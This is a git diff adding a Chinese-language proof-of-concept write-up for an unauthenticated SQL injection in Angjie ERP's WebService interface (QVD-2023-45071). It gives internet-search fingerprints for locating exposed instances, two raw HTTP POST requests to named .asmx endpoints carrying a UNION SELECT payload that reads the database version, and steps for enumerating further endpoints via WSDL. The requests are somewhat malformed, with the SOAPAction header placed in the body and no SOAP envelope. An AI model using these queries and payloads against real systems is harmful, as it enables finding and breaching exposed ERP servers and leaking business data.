diff --git a/昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md b/昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md
new file mode 100644
index 0000000..cd9ed16
--- /dev/null
+++ b/昂捷ERP WebService接口 SQL注入漏洞(QVD-2023-45071).md
@@ -0,0 +1,56 @@
+## 昂捷ERP-WebService接口-SQL注入漏洞(QVD-2023-45071)
+ 昂捷ERP WebService接口 存在SQL注入漏洞,未经身份验证的攻击者可以利用该漏洞泄露系统敏感信息。
+
+## fofa
+```
+body="CheckSilverlightInstalled"
+```
+
+## hunter
+```
+web.body="CheckSilverlightInstalled"
+```
+
+## SQL注入点1 /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx
+```
+POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
+Host: xxx.xxx.xxx.xxx:8008
+Content-Type: text/xml;
+charset=utf-8
+Content-Length: 482
+
+SOAPAction: "http://tempuri.org/GetOSpById"
+string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj
+```
+
+## SQL注入点2 /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx
+```
+POST /EnjoyRMIS_WS/WS/Hr/CWSHr.asmx HTTP/1.1
+Host: xxx.xxx.xxx.xxx:8008
+Content-Type: text/xml;
+charset=utf-8
+Content-Length: 482
+
+SOAPAction: "http://tempuri.org/GetOSpById"
+string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj
+```
+
+## 漏洞复现
+访问漏洞点存在的地址
+
+http://xxx.xxx.xxx.xxx:9012/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx
+
+在地址后面加上?wsdl
+
+http://xxx.xxx.xxx.xxx:8123/EnjoyRMIS_WS/WS/Hr/CWSHr.asmx?wsdl
+
+
+
+使用wsdler拓展工具解析
+
+
+
+解析完成之后,即可对这些接口进行测试
+
+
+